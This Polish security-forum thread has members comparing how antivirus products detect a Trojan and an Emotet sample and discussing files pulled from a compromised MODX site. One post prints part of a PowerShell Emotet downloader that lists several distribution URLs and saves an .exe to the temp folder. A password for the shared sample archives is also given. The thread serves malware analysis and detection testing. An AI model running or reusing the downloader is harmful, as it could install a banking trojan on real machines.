Paczki, malware, złośliwe pliki, linki itp.
Witam po kilku letniej przerwie- Gdata wykrył Trojan .GenericKD.31077014.
Odpowiedz
Otrzymałem meila z linkiem do pobrania pliku .doc. Plik zmienia się na losową nazwę.
Treść widoczna jedynie dla zarejestrowanych użytkowników

Wyniki na VT:

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]


HitmanPro, ZAM nie wykrywa, Secureaplus wykrywa na razie pierwszy plik.
Odpowiedz
Chrome blokuje i muszę odznaczyć ochronę w chromie
Odpowiedz

[Aby zobaczyć linki, zarejestruj się tutaj]


i COS:


Załączone pliki Miniatury
   

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
Kaspersky free usuwa bez pytania Grin
Odpowiedz
Skrypt w powershell pobiera i ładuje Emotet - trojan bankowy.

Kod:
$GKM=new-object Net.WebClient;$Oza='http://jandkonline.com/smp/B4Nxg4v/@http://michaelkammes.com/N9vdTTT/@http://www.wrightstexasnursery.com/1koy/@http://creative-machine.net/eh0HC/@http://redwire.us/rco/P5DDr/'.Split('@');$faE = '85';$mvI=$env:temp+'\'+$faE+'.exe';foreach($Rmp in $O
Odpowiedz
W wordzie mam obrazek ale nic się nie otwiera, pewnie dlatego że użyłem hardentools.
Czy to że comodo czy kaspersky free blokują te strony zależy tylko od wprowadzenia tych stron do bazy danych? czy te programy radzą sobie z wykrywaniem nieznanych zagrożeń?
Odpowiedz
Tak hardentools może blokować zawartość. Comodo to zagrożenie wykrywa behawioralnie za pomocą wzorców zachowań po przez viruscope. Kaspersky myślę podobnie.

Próbka Emotet

Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
Kaspersky rozpoznaje a SecureAplus nie
Odpowiedz
Kaspersky free blokuje odnośnik do strony a wyłączony - po włączeniu rozpoznaje zagrożenie, secureaplus wykrywa plik po pobraniu (z silnika eset).
Comodo Cloud AV nie wykrywa nic.
Odpowiedz
Secure dalej nic ...  secureaplus wykrywa plik po pobraniu - a nie po rozpakowaniu go ? Jaką masz licencje ?


Cytat:Kaspersky free blokuje odnośnik do strony a wyłączony
putin sam kontroluje Twój komputer Grin
Odpowiedz
(18.07.2018, 21:11)Sillo napisał(a):

[Aby zobaczyć linki, zarejestruj się tutaj]

Secure dalej nic ...  secureaplus wykrywa plik po pobraniu - a nie po rozpakowaniu go ? Jaką masz licencje ?

[Obrazek: WKNGkfkm.jpg]
Secureaplus licencja premium.
Cytat:Kaspersky free blokuje odnośnik do strony a wyłączony
putin sam kontroluje Twój komputer Grin



jak nie putin to nsa, itp Smile wcześniej używałem kaspra, ostatnio Appguard + SS + Hitman na żądanie. Dzisiaj zainstalowałem Secureaplus i KF na próbę Smile
Odpowiedz
aha, to juz wiem czemu - mam free , masz info na temat premium za free ?
Odpowiedz
MKS Vir nie wykrywa....

Wykrywają go :

Secure a plus Premium silnikiem Eset
Zemana
Immunet
Windows Defender

Wysyłam plik do analizy labu MKS
Odpowiedz
(18.07.2018, 21:57)Sillo napisał(a):

[Aby zobaczyć linki, zarejestruj się tutaj]

aha, to juz wiem czemu - mam free , masz info na temat premium za free ?
Niestety nie, ostatnie promo było w maju.
Odpowiedz
Bitdefender 2019 i Secureaplus 5 beta wykrywają po rozpakowaniu (Secure silnikiem Eset).
Odpowiedz
Comodo Cloud AV wykrywa sygnaturą, a po wyłączeniu AV Viruscope wykrywa.


Załączone pliki Miniatury
   

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
Ostatnio poszła spora kampania na modx (próbowali też na wordpress, ale troszku im nie wyszło)
Poniżej pliki które wyodrębniłem z masy strony:
.ico - sterowniki do kampanii spamowej
2 coiny
kilka zaszyfrowanych plików, niestety nie udało mi się ich odszyfrować, może ktoś da radę.

Treść widoczna jedynie dla zarejestrowanych użytkowników

Vt nic nie wykrywa, przy pobieraniu z ftp Norton jedynie wywalił wszystkie js, rozpoznanie Nortona: 

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
rogacz
Jakie hasło ?
Post sprawdzony przez  MKS_VIR


Odpowiedz
O kurczaki starość Smile

"safegroup"
Odpowiedz


Skocz do:


Użytkownicy przeglądający ten wątek: 24 gości